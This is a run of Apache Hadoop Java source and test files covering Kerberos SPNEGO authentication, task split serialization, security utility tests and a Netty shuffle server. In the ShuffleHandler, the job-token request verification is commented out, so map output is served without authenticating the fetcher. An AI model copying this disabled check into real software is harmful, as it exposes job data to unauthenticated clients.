private static Logger LOG = LoggerFactory.getLogger(KerberosAuthenticationHandler.class);
/**
* Kerberos context configuration for the JDK GSS library.
*/
private static class KerberosConfiguration extends Configuration {
private String keytab;
private String principal;
public KerberosConfiguration(String keytab, String principal) {
this.keytab = keytab;
this.principal = principal;
}
@Override
public AppConfigurationEntry[] getAppConfigurationEntry(String name) {
Map<String, String> options = new HashMap<String, String>();
options.put("keyTab", keytab);
options.put("principal", principal);
options.put("useKeyTab", "true");
options.put("storeKey", "true");
options.put("doNotPrompt", "true");
options.put("useTicketCache", "true");
options.put("renewTGT", "true");
options.put("refreshKrb5Config", "true");
options.put("isInitiator", "false");
String ticketCache = System.getenv("KRB5CCNAME");
if (ticketCache != null) {
options.put("ticketCache", ticketCache);
}
if (LOG.isDebugEnabled()) {
options.put("debug", "true");
}
return new AppConfigurationEntry[]{
new AppConfigurationEntry(Krb5LoginModule.class.getName(),
AppConfigurationEntry.LoginModuleControlFlag.REQUIRED,
options),};
}
}
/**
* Constant that identifies the authentication mechanism.
*/
public static final String TYPE = "kerberos";
/**
* Constant for the configuration property that indicates the kerberos principal.
*/
public static final String PRINCIPAL = TYPE + ".principal";
/**
* Constant for the configuration property that indicates the keytab file path.
*/
public static final String KEYTAB = TYPE + ".keytab";
/**
* Constant for the configuration property that indicates the Kerberos name
* rules for the Kerberos principals.
*/
public static final String NAME_RULES = TYPE + ".name.rules";
private String principal;
private String keytab;
private GSSManager gssManager;
private LoginContext loginContext;
/**
* Initializes the authentication handler instance.
* <p/>
* It creates a Kerberos context using the principal and keytab specified in the configuration.
* <p/>
* This method is invoked by the {@link AuthenticationFilter#init} method.
*
* @param config configuration properties to initialize the handler.
*
* @throws ServletException thrown if the handler could not be initialized.
*/
@Override
public void init(Properties config) throws ServletException {
try {
principal = config.getProperty(PRINCIPAL, principal);
if (principal == null || principal.trim().length() == 0) {
throw new ServletException("Principal not defined in configuration");
}
keytab = config.getProperty(KEYTAB, keytab);
if (keytab == null || keytab.trim().length() == 0) {
throw new ServletException("Keytab not defined in configuration");
}
if (!new File(keytab).exists()) {
throw new ServletException("Keytab does not exist: " + keytab);
}
String nameRules = config.getProperty(NAME_RULES, null);
if (nameRules != null) {
KerberosName.setRules(nameRules);
}
Set<Principal> principals = new HashSet<Principal>();
principals.add(new KerberosPrincipal(principal));
Subject subject = new Subject(false, principals, new HashSet<Object>(), new HashSet<Object>());
KerberosConfiguration kerberosConfiguration = new KerberosConfiguration(keytab, principal);
loginContext = new LoginContext("", subject, null, kerberosConfiguration);
loginContext.login();
Subject serverSubject = loginContext.getSubject();
try {
gssManager = Subject.doAs(serverSubject, new PrivilegedExceptionAction<GSSManager>() {
@Override
public GSSManager run() throws Exception {
return GSSManager.getInstance();
}
});
} catch (PrivilegedActionException ex) {
throw ex.getException();
}
LOG.info("Initialized, principal [{}] from keytab [{}]", principal, keytab);
} catch (Exception ex) {
throw new ServletException(ex);
}
}
/**
* Releases any resources initialized by the authentication handler.
* <p/>
* It destroys the Kerberos context.
*/
@Override
public void destroy() {
try {
if (loginContext != null) {
loginContext.logout();
loginContext = null;
}
} catch (LoginException ex) {
LOG.warn(ex.getMessage(), ex);
}
}
/**
* Returns the authentication type of the authentication handler, 'kerberos'.
* <p/>
*
* @return the authentication type of the authentication handler, 'kerberos'.
*/
@Override
public String getType() {
return TYPE;
}
/**
* Returns the Kerberos principal used by the authentication handler.
*
* @return the Kerberos principal used by the authentication handler.
*/
protected String getPrincipal() {
return principal;
}
/**
* Returns the keytab used by the authentication handler.
*
* @return the keytab used by the authentication handler.
*/
protected String getKeytab() {
return keytab;
}
/**
* It enforces the the Kerberos SPNEGO authentication sequence returning an {@link AuthenticationToken} only
* after the Kerberos SPNEGO sequence has completed successfully.
* <p/>
*
* @param request the HTTP client request.
* @param response the HTTP client response.
*
* @return an authentication token if the Kerberos SPNEGO sequence is complete and valid,
* <code>null</code> if it is in progress (in this case the handler handles the response to the client).
*
* @throws IOException thrown if an IO error occurred.
* @throws AuthenticationException thrown if Kerberos SPNEGO sequence failed.
*/
@Override
public AuthenticationToken authenticate(HttpServletRequest request, final HttpServletResponse response)
throws IOException, AuthenticationException {
AuthenticationToken token = null;
String authorization = request.getHeader(KerberosAuthenticator.AUTHORIZATION);
if (authorization == null || !authorization.startsWith(KerberosAuthenticator.NEGOTIATE)) {
response.setHeader(KerberosAuthenticator.WWW_AUTHENTICATE, KerberosAuthenticator.NEGOTIATE);
response.setStatus(HttpServletResponse.SC_UNAUTHORIZED);
if (authorization == null) {
LOG.trace("SPNEGO starting");
} else {
LOG.warn("'" + KerberosAuthenticator.AUTHORIZATION + "' does not start with '" +
KerberosAuthenticator.NEGOTIATE + "' : {}", authorization);
}
} else {
authorization = authorization.substring(KerberosAuthenticator.NEGOTIATE.length()).trim();
final Base64 base64 = new Base64(0);
final byte[] clientToken = base64.decode(authorization);
Subject serverSubject = loginContext.getSubject();
try {
token = Subject.doAs(serverSubject, new PrivilegedExceptionAction<AuthenticationToken>() {
@Override
public AuthenticationToken run() throws Exception {
AuthenticationToken token = null;
GSSContext gssContext = null;
try {
gssContext = gssManager.createContext((GSSCredential) null);
byte[] serverToken = gssContext.acceptSecContext(clientToken, 0, clientToken.length);
if (serverToken != null && serverToken.length > 0) {
String authenticate = base64.encodeToString(serverToken);
response.setHeader(KerberosAuthenticator.WWW_AUTHENTICATE,
KerberosAuthenticator.NEGOTIATE + " " + authenticate);
}
if (!gssContext.isEstablished()) {
response.setStatus(HttpServletResponse.SC_UNAUTHORIZED);
LOG.trace("SPNEGO in progress");
} else {
String clientPrincipal = gssContext.getSrcName().toString();
KerberosName kerberosName = new KerberosName(clientPrincipal);
String userName = kerberosName.getShortName();
token = new AuthenticationToken(userName, clientPrincipal, TYPE);
response.setStatus(HttpServletResponse.SC_OK);
LOG.trace("SPNEGO completed for principal [{}]", clientPrincipal);
}
} finally {
if (gssContext != null) {
gssContext.dispose();
}
}
return token;
}
});
} catch (PrivilegedActionException ex) {
if (ex.getException() instanceof IOException) {
throw (IOException) ex.getException();
}
else {
throw new AuthenticationException(ex.getException());
}
}
}
return token;
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/TaskSplitInfo.java<|end_filename|>
package org.apache.hadoop.mapred;
import java.io.ByteArrayInputStream;
import java.io.DataInput;
import java.io.DataInputStream;
import java.io.DataOutput;
import java.io.IOException;
import org.apache.hadoop.conf.Configurable;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.io.Writable;
import org.apache.hadoop.mapreduce.InputSplit;
import org.apache.hadoop.util.ReflectionUtils;
public class TaskSplitInfo implements Writable, Configurable {
private String inputSplitClass;
private byte[] inputSplitObject;
private Configuration conf;
public TaskSplitInfo(JobConf conf, SplitInfo splitInfo) {
this.conf = conf;
this.setInputSplitClass(splitInfo.getInputSplitClass());
this.setInputSplitObject(splitInfo.getInputSplitObject());
}
public TaskSplitInfo(JobConf conf, String inputSplitClass,
byte[] inputSplitObject) {
this.conf = conf;
this.setInputSplitClass(inputSplitClass);
this.setInputSplitObject(inputSplitObject);
}
public TaskSplitInfo() {
}
public org.apache.hadoop.mapred.InputSplit getOldSplit() throws ClassNotFoundException, IOException {
org.apache.hadoop.mapred.InputSplit split = (org.apache.hadoop.mapred.InputSplit)ReflectionUtils.newInstance(conf.getClassByName(inputSplitClass), conf);
ByteArrayInputStream input = new ByteArrayInputStream(inputSplitObject);
DataInputStream in = new DataInputStream(input);
split.readFields(in);
return split;
}
public org.apache.hadoop.mapreduce.InputSplit getNewSplit() throws IOException, ClassNotFoundException {
org.apache.hadoop.mapreduce.InputSplit split = (org.apache.hadoop.mapreduce.InputSplit)ReflectionUtils.newInstance(conf.getClassByName(inputSplitClass), conf);
ByteArrayInputStream input = new ByteArrayInputStream(inputSplitObject);
DataInputStream in = new DataInputStream(input);
((Writable)split).readFields(in);
return split;
}
@Override
public void readFields(DataInput in) throws IOException {
setInputSplitClass(in.readUTF());
int len = in.readInt();
setInputSplitObject(new byte[len]);
in.readFully(getInputSplitObject());
}
@Override
public void write(DataOutput out) throws IOException {
out.writeUTF(inputSplitClass);
out.writeInt(inputSplitObject.length);
out.write(inputSplitObject);
}
@Override
public Configuration getConf() {
return conf;
}
@Override
public void setConf(Configuration conf) {
this.conf = conf;
}
public void setInputSplitClass(String inputSplitClass) {
this.inputSplitClass = inputSplitClass;
}
public String getInputSplitClass() {
return inputSplitClass;
}
public void setInputSplitObject(byte[] inputSplitObject) {
this.inputSplitObject = inputSplitObject;
}
public byte[] getInputSplitObject() {
return inputSplitObject;
}
}
<|start_filename|>src/test/org/apache/hadoop/security/TestSecurityUtil.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with this
* work for additional information regarding copyright ownership. The ASF
* licenses this file to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package org.apache.hadoop.security;
import static org.junit.Assert.*;
import java.io.IOException;
import java.net.InetAddress;
import org.junit.Test;
import org.mockito.Mockito;
public class TestSecurityUtil {
@Test
public void isOriginalTGTReturnsCorrectValues() {
assertTrue(SecurityUtil.isOriginalTGT("krbtgt/foo@foo"));
assertTrue(SecurityUtil.isOriginalTGT("krbtgt/foo.bar.bat@foo.bar.bat"));
assertFalse(SecurityUtil.isOriginalTGT(null));
assertFalse(SecurityUtil.isOriginalTGT("blah"));
assertFalse(SecurityUtil.isOriginalTGT(""));
assertFalse(SecurityUtil.isOriginalTGT("krbtgt/hello"));
assertFalse(SecurityUtil.isOriginalTGT("/@"));
assertFalse(SecurityUtil.isOriginalTGT("this@is/notright"));
assertFalse(SecurityUtil.isOriginalTGT("krbtgt/foo@FOO"));
}
private void verify(String original, String hostname, String expected)
throws IOException {
assertEquals(expected,
SecurityUtil.getServerPrincipal(original, hostname));
InetAddress addr = mockAddr(hostname);
assertEquals(expected,
SecurityUtil.getServerPrincipal(original, addr));
}
private InetAddress mockAddr(String reverseTo) {
InetAddress mock = Mockito.mock(InetAddress.class);
Mockito.doReturn(reverseTo).when(mock).getCanonicalHostName();
return mock;
}
@Test
public void testGetServerPrincipal() throws IOException {
String service = "hdfs/";
String realm = "@REALM";
String hostname = "foohost";
String userPrincipal = "foo@FOOREALM";
String shouldReplace = service + SecurityUtil.HOSTNAME_PATTERN + realm;
String replaced = service + hostname + realm;
verify(shouldReplace, hostname, replaced);
String shouldNotReplace = service + SecurityUtil.HOSTNAME_PATTERN + "NAME"
+ realm;
verify(shouldNotReplace, hostname, shouldNotReplace);
verify(userPrincipal, hostname, userPrincipal);
// testing reverse DNS lookup doesn't happen
InetAddress notUsed = Mockito.mock(InetAddress.class);
assertEquals(shouldNotReplace, SecurityUtil.getServerPrincipal(
shouldNotReplace, notUsed));
Mockito.verify(notUsed, Mockito.never()).getCanonicalHostName();
}
@Test
public void testLocalHostNameForNullOrWild() throws Exception {
String local = SecurityUtil.getLocalHostName();
assertEquals("hdfs/" + local + "@REALM", SecurityUtil.getServerPrincipal(
"hdfs/_HOST@REALM", (String) null));
assertEquals("hdfs/" + local + "@REALM", SecurityUtil.getServerPrincipal(
"hdfs/_HOST@REALM", "0.0.0.0"));
}
}
<|start_filename|>src/test/org/apache/hadoop/mapred/TestTaskTrackerDirectories.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import static org.junit.Assert.*;
import java.io.File;
import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.LocalDirAllocator;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.RawLocalFileSystem;
import org.apache.hadoop.fs.LocalFileSystem;
import org.apache.hadoop.mapred.TaskTracker.LocalStorage;
import org.junit.Test;
import org.junit.Before;
import org.mockito.Mockito;
/**
* Tests for the correct behavior of the TaskTracker starting up with
* respect to its local-disk directories.
*/
public class TestTaskTrackerDirectories {
private final String TEST_DIR = new File("build/test/testmapredlocaldir")
.getAbsolutePath();
@Before
public void deleteTestDir() throws IOException {
FileUtil.fullyDelete(new File(TEST_DIR));
assertFalse("Could not delete " + TEST_DIR,
new File(TEST_DIR).exists());
}
@Test
public void testCreatesLocalDirs() throws Exception {
Configuration conf = new Configuration();
String[] dirs = new String[] {
TEST_DIR + "/local1",
TEST_DIR + "/local2"
};
conf.setStrings("mapred.local.dir", dirs);
setupTaskTracker(conf);
for (String dir : dirs) {
checkDir(dir);
}
}
@Test
public void testFixesLocalDirPermissions() throws Exception {
Configuration conf = new Configuration();
String[] dirs = new String[] {
TEST_DIR + "/badperms"
};
new File(dirs[0]).mkdirs();
FileUtil.chmod(dirs[0], "000");
conf.setStrings("mapred.local.dir", dirs);
setupTaskTracker(conf);
for (String dir : dirs) {
checkDir(dir);
}
}
@Test
public void testCreatesLogDirs() throws Exception {
String[] dirs = new String[] {
TEST_DIR + "/local1",
TEST_DIR + "/local2"
};
Path logDir1 = new Path(dirs[0], TaskLog.USERLOGS_DIR_NAME);
Path logDir2 = new Path(dirs[1], TaskLog.USERLOGS_DIR_NAME);
FileUtil.fullyDelete(new File(logDir1.toString()));
FileUtil.fullyDelete(new File(logDir2.toString()));
Configuration conf = new Configuration();
conf.setStrings("mapred.local.dir", dirs);
setupTaskTracker(conf);
checkDir(logDir1.toString());
checkDir(logDir2.toString());
}
@Test
public void testFixesLogDirPermissions() throws Exception {
String[] dirs = new String[] {
TEST_DIR + "/local1"
};
File dir = new File(dirs[0]);
FileUtil.fullyDelete(dir);
dir.mkdirs();
FileUtil.chmod(dir.getAbsolutePath(), "000");
Configuration conf = new Configuration();
conf.setStrings("mapred.local.dir", dirs);
setupTaskTracker(conf);
checkDir(dir.getAbsolutePath());
}
private void setupTaskTracker(Configuration conf) throws Exception {
JobConf ttConf = new JobConf(conf);
// Doesn't matter what we give here - we won't actually
// connect to it.
TaskTracker tt = new TaskTracker();
tt.setConf(ttConf);
tt.setTaskController(Mockito.mock(TaskController.class));
LocalDirAllocator localDirAllocator =
new LocalDirAllocator("mapred.local.dir");
tt.setLocalDirAllocator(localDirAllocator);
LocalFileSystem localFs = FileSystem.getLocal(conf);
LocalStorage localStorage = new LocalStorage(ttConf.getLocalDirs());
localStorage.checkDirs(localFs, true);
tt.setLocalStorage(localStorage);
tt.setLocalFileSystem(localFs);
tt.initializeDirectories();
}
private void checkDir(String dir) throws IOException {
FileSystem fs = RawLocalFileSystem.get(new Configuration());
File f = new File(dir);
assertTrue(dir + " should exist", f.exists());
FileStatus stat = fs.getFileStatus(new Path(dir));
assertEquals(dir + " has correct permissions",
0755, stat.getPermission().toShort());
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/ShuffleHandler.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import static org.jboss.netty.buffer.ChannelBuffers.wrappedBuffer;
import static org.jboss.netty.handler.codec.http.HttpHeaders.Names.CONTENT_TYPE;
import static org.jboss.netty.handler.codec.http.HttpMethod.GET;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.BAD_REQUEST;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.FORBIDDEN;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.INTERNAL_SERVER_ERROR;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.METHOD_NOT_ALLOWED;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.NOT_FOUND;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.OK;
import static org.jboss.netty.handler.codec.http.HttpResponseStatus.UNAUTHORIZED;
import static org.jboss.netty.handler.codec.http.HttpVersion.HTTP_1_1;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.RandomAccessFile;
import java.net.InetSocketAddress;
import java.net.URL;
import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.concurrent.Executors;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.TimeUnit;
import javax.crypto.SecretKey;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.LocalDirAllocator;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.DataOutputBuffer;
import org.apache.hadoop.mapred.task.reduce.ShuffleHeader;
import org.apache.hadoop.mapreduce.security.SecureShuffleUtils;
import org.apache.hadoop.mapreduce.security.token.JobTokenIdentifier;
import org.apache.hadoop.security.token.Token;
import org.jboss.netty.bootstrap.ServerBootstrap;
import org.jboss.netty.buffer.ChannelBuffers;
import org.jboss.netty.channel.Channel;
import org.jboss.netty.channel.ChannelFactory;
import org.jboss.netty.channel.ChannelFuture;
import org.jboss.netty.channel.ChannelFutureListener;
import org.jboss.netty.channel.ChannelHandlerContext;
import org.jboss.netty.channel.ChannelPipeline;
import org.jboss.netty.channel.ChannelPipelineFactory;
import org.jboss.netty.channel.Channels;
import org.jboss.netty.channel.DefaultFileRegion;
import org.jboss.netty.channel.ExceptionEvent;
import org.jboss.netty.channel.FileRegion;
import org.jboss.netty.channel.MessageEvent;
import org.jboss.netty.channel.SimpleChannelUpstreamHandler;
import org.jboss.netty.channel.group.ChannelGroup;
import org.jboss.netty.channel.group.DefaultChannelGroup;
import org.jboss.netty.channel.socket.nio.NioServerSocketChannelFactory;
import org.jboss.netty.handler.codec.frame.TooLongFrameException;
import org.jboss.netty.handler.codec.http.DefaultHttpResponse;
import org.jboss.netty.handler.codec.http.HttpChunkAggregator;
import org.jboss.netty.handler.codec.http.HttpRequest;
import org.jboss.netty.handler.codec.http.HttpRequestDecoder;
import org.jboss.netty.handler.codec.http.HttpResponse;
import org.jboss.netty.handler.codec.http.HttpResponseEncoder;
import org.jboss.netty.handler.codec.http.HttpResponseStatus;
import org.jboss.netty.handler.codec.http.QueryStringDecoder;
import org.jboss.netty.handler.stream.ChunkedWriteHandler;
import org.jboss.netty.util.CharsetUtil;
import com.google.common.util.concurrent.ThreadFactoryBuilder;
public class ShuffleHandler {
private static final Log LOG = LogFactory.getLog(ShuffleHandler.class);
private int port;
private ChannelFactory selector;
private final ChannelGroup accepted = new DefaultChannelGroup();
public static final String MAPREDUCE_SHUFFLE_SERVICEID = "mapreduce.shuffle";
public static final String SHUFFLE_PORT_CONFIG_KEY = "mapreduce.shuffle.port";
public static final int DEFAULT_SHUFFLE_PORT = 8080;
public final Configuration conf;
public final TaskTracker tt;
public ShuffleHandler(TaskTracker tt, Configuration conf) {
this.tt = tt;
this.conf = conf;
}
/**
* Serialize the shuffle port into a ByteBuffer for use later on.
*
* @param port
* the port to be sent to the ApplciationMaster
* @return the serialized form of the port.
*/
static ByteBuffer serializeMetaData(int port) throws IOException {
// TODO these bytes should be versioned
DataOutputBuffer port_dob = new DataOutputBuffer();
port_dob.writeInt(port);
return ByteBuffer.wrap(port_dob.getData(), 0, port_dob.getLength());
}
/**
* A helper function to deserialize the metadata returned by ShuffleHandler.
*
* @param meta
* the metadata returned by the ShuffleHandler
* @return the port the Shuffle Handler is listening on to serve shuffle data.
*/
public static int deserializeMetaData(ByteBuffer meta) throws IOException {
// TODO this should be returning a class not just an int
DataInputByteBuffer in = new DataInputByteBuffer();
in.reset(meta);
int port = in.readInt();
return port;
}
/**
* A helper function to serialize the JobTokenIdentifier to be sent to the
* ShuffleHandler as ServiceData.
*
* @param jobToken
* the job token to be used for authentication of shuffle data
* requests.
* @return the serialized version of the jobToken.
*/
public static ByteBuffer serializeServiceData(
Token<JobTokenIdentifier> jobToken) throws IOException {
// TODO these bytes should be versioned
DataOutputBuffer jobToken_dob = new DataOutputBuffer();
jobToken.write(jobToken_dob);
return ByteBuffer
.wrap(jobToken_dob.getData(), 0, jobToken_dob.getLength());
}
static Token<JobTokenIdentifier> deserializeServiceData(ByteBuffer secret)
throws IOException {
DataInputByteBuffer in = new DataInputByteBuffer();
in.reset(secret);
Token<JobTokenIdentifier> jt = new Token<JobTokenIdentifier>();
jt.readFields(in);
return jt;
}
private synchronized void init() {
ThreadFactory bossFactory = new ThreadFactoryBuilder().setNameFormat(
"ShuffleHandler Netty Boss #%d").build();
ThreadFactory workerFactory = new ThreadFactoryBuilder().setNameFormat(
"ShuffleHandler Netty Worker #%d").build();
selector = new NioServerSocketChannelFactory(Executors
.newCachedThreadPool(bossFactory), Executors
.newCachedThreadPool(workerFactory), conf.getInt(
"mapreduce.netty.shuffle.server.handler.count", 2 * Runtime
.getRuntime().availableProcessors()));
}
// TODO change AbstractService to throw InterruptedException
public synchronized void start() {
init();
ServerBootstrap bootstrap = new ServerBootstrap(selector);
HttpPipelineFactory pipelineFact = new HttpPipelineFactory(conf);
bootstrap.setPipelineFactory(pipelineFact);
this.port = conf.getInt(SHUFFLE_PORT_CONFIG_KEY, DEFAULT_SHUFFLE_PORT);
Channel ch = bootstrap.bind(new InetSocketAddress(port));
accepted.add(ch);
int actualPort = ((InetSocketAddress) ch.getLocalAddress()).getPort();
if (port != actualPort) {
throw new RuntimeException("Shuffle Server Port " + port
+ " has already be in use");
}
conf.set(SHUFFLE_PORT_CONFIG_KEY, Integer.toString(port));
pipelineFact.SHUFFLE.setPort(port);
LOG.info("Netty shuffle server " + " listening on port " + port);
}
public int getPort() {
return port;
}
public synchronized void stop() {
accepted.close().awaitUninterruptibly(10, TimeUnit.SECONDS);
ServerBootstrap bootstrap = new ServerBootstrap(selector);
bootstrap.releaseExternalResources();
}
public synchronized ByteBuffer getMeta() {
try {
return serializeMetaData(port);
} catch (IOException e) {
LOG.error("Error during getMeta", e);
// TODO add API to AuxiliaryServices to report failures
return null;
}
}
class HttpPipelineFactory implements ChannelPipelineFactory {
final Shuffle SHUFFLE;
public HttpPipelineFactory(Configuration conf) {
SHUFFLE = new Shuffle(conf);
}
@Override
public ChannelPipeline getPipeline() throws Exception {
return Channels.pipeline(new HttpRequestDecoder(),
new HttpChunkAggregator(1 << 16), new HttpResponseEncoder(),
new ChunkedWriteHandler(), SHUFFLE);
}
}
class Shuffle extends SimpleChannelUpstreamHandler {
private final Configuration conf;
private final IndexCache indexCache;
private final LocalDirAllocator lDirAlloc = new LocalDirAllocator(
"mapred.local.dir");
private int port;
public Shuffle(Configuration conf) {
this.conf = conf;
indexCache = new IndexCache(new JobConf(conf));
this.port = conf.getInt(SHUFFLE_PORT_CONFIG_KEY, DEFAULT_SHUFFLE_PORT);
}
public void setPort(int port) {
this.port = port;
}
private List<String> splitMaps(List<String> mapq) {
if (null == mapq) {
return null;
}
final List<String> ret = new ArrayList<String>();
for (String s : mapq) {
Collections.addAll(ret, s.split(","));
}
return ret;
}
@Override
public void messageReceived(ChannelHandlerContext ctx, MessageEvent evt)
throws Exception {
HttpRequest request = (HttpRequest) evt.getMessage();
if (request.getMethod() != GET) {
sendError(ctx, METHOD_NOT_ALLOWED);
return;
}
final Map<String, List<String>> q = new QueryStringDecoder(request
.getUri()).getParameters();
final List<String> mapIds = splitMaps(q.get("map"));
final List<String> reduceQ = q.get("reduce");
final List<String> jobQ = q.get("job");
if (LOG.isDebugEnabled()) {
LOG.debug("RECV: " + request.getUri() + "\n mapId: " + mapIds
+ "\n reduceId: " + reduceQ + "\n jobId: " + jobQ);
}
if (mapIds == null || reduceQ == null || jobQ == null) {
sendError(ctx, "Required param job, map and reduce", BAD_REQUEST);
return;
}
if (reduceQ.size() != 1 || jobQ.size() != 1) {
sendError(ctx, "Too many job/reduce parameters", BAD_REQUEST);
return;
}
int reduceId;
String jobId;
try {
reduceId = Integer.parseInt(reduceQ.get(0));
jobId = jobQ.get(0);
} catch (NumberFormatException e) {
sendError(ctx, "Bad reduce parameter", BAD_REQUEST);
return;
} catch (IllegalArgumentException e) {
sendError(ctx, "Bad job parameter", BAD_REQUEST);
return;
}
final String reqUri = request.getUri();
if (null == reqUri) {
// TODO? add upstream?
sendError(ctx, FORBIDDEN);
return;
}
HttpResponse response = new DefaultHttpResponse(HTTP_1_1, OK);
// try {
// verifyRequest(jobId, ctx, request, response, new URL("http", "",
// this.port, reqUri));
// } catch (IOException e) {
// LOG.warn("Shuffle failure ", e);
// sendError(ctx, e.getMessage(), UNAUTHORIZED);
// return;
// }
Channel ch = evt.getChannel();
ch.write(response);
// TODO refactor the following into the pipeline
ChannelFuture lastMap = null;
for (String mapId : mapIds) {
try {
lastMap = sendMapOutput(ctx, ch, tt.getRunAsUserName(jobId), jobId,
mapId, reduceId);
if (null == lastMap) {
sendError(ctx, NOT_FOUND);
return;
}
} catch (IOException e) {
LOG.error("Shuffle error ", e);
sendError(ctx, e.getMessage(), INTERNAL_SERVER_ERROR);
return;
}
}
lastMap.addListener(ChannelFutureListener.CLOSE);
}
private void verifyRequest(
String jobId,
ChannelHandlerContext ctx,
HttpRequest request,
HttpResponse response,
URL requestUri) throws IOException {
SecretKey tokenSecret = tt.getJobTokenSecretManager()
.retrieveTokenSecret(jobId);
if (null == tokenSecret) {
LOG.info("Request for unknown token " + jobId);
throw new IOException("could not find jobid");
}
// string to encrypt
String enc_str = SecureShuffleUtils.buildMsgFrom(requestUri);
// hash from the fetcher
String urlHashStr = request
.getHeader(SecureShuffleUtils.HTTP_HEADER_URL_HASH);
if (urlHashStr == null) {
LOG.info("Missing header hash for " + jobId);
throw new IOException("fetcher cannot be authenticated");
}
if (LOG.isDebugEnabled()) {
int len = urlHashStr.length();
LOG.debug("verifying request. enc_str=" + enc_str + "; hash=..."
+ urlHashStr.substring(len - len / 2, len - 1));
}
// verify - throws exception
SecureShuffleUtils.verifyReply(urlHashStr, enc_str, tokenSecret);
// verification passed - encode the reply
String reply = SecureShuffleUtils.generateHash(urlHashStr.getBytes(),
tokenSecret);
response.setHeader(SecureShuffleUtils.HTTP_HEADER_REPLY_URL_HASH, reply);
if (LOG.isDebugEnabled()) {
int len = reply.length();
LOG.debug("Fetcher request verfied. enc_str=" + enc_str + ";reply="
+ reply.substring(len - len / 2, len - 1));
}
}
protected ChannelFuture sendMapOutput(
ChannelHandlerContext ctx,
Channel ch,
String user,
String jobId,
String mapId,
int reduce) throws IOException {
Path indexFileName = tt.getIndexFile(jobId, mapId);
Path mapOutputFileName = tt.getMapOutputFile(jobId, mapId);
IndexRecord info = indexCache.getIndexInformation(mapId, reduce,
indexFileName, user);
final ShuffleHeader header = new ShuffleHeader(mapId, info.partLength,
info.rawLength, reduce);
final DataOutputBuffer dob = new DataOutputBuffer();
header.write(dob);
ch.write(wrappedBuffer(dob.getData(), 0, dob.getLength()));
File spillfile = new File(mapOutputFileName.toString());
RandomAccessFile spill;
try {
spill = new RandomAccessFile(spillfile, "r");
} catch (FileNotFoundException e) {
LOG.info(spillfile + " not found");
return null;
}
final FileRegion partition = new DefaultFileRegion(spill.getChannel(),
info.startOffset, info.partLength);
ChannelFuture writeFuture = ch.write(partition);
writeFuture.addListener(new ChannelFutureListener() {
// TODO error handling; distinguish IO/connection failures,
// attribute to appropriate spill output
@Override
public void operationComplete(ChannelFuture future) {
partition.releaseExternalResources();
}
});
return writeFuture;
}
private void sendError(ChannelHandlerContext ctx, HttpResponseStatus status) {
sendError(ctx, "", status);
}
private void sendError(
ChannelHandlerContext ctx,
String message,
HttpResponseStatus status) {
HttpResponse response = new DefaultHttpResponse(HTTP_1_1, status);
response.setHeader(CONTENT_TYPE, "text/plain; charset=UTF-8");
response.setContent(ChannelBuffers.copiedBuffer(message,
CharsetUtil.UTF_8));
// Close the connection as soon as the error message is sent.
ctx.getChannel().write(response)
.addListener(ChannelFutureListener.CLOSE);
}
@Override
public void exceptionCaught(ChannelHandlerContext ctx, ExceptionEvent e)
throws Exception {
Channel ch = e.getChannel();
Throwable cause = e.getCause();
if (cause instanceof TooLongFrameException) {
sendError(ctx, BAD_REQUEST);
return;
}
LOG.error("Shuffle error: ", cause);
if (ch.isConnected()) {
LOG.error("Shuffle error " + e);
sendError(ctx, INTERNAL_SERVER_ERROR);
}
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/task/reduce/ShuffleClientMetrics.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
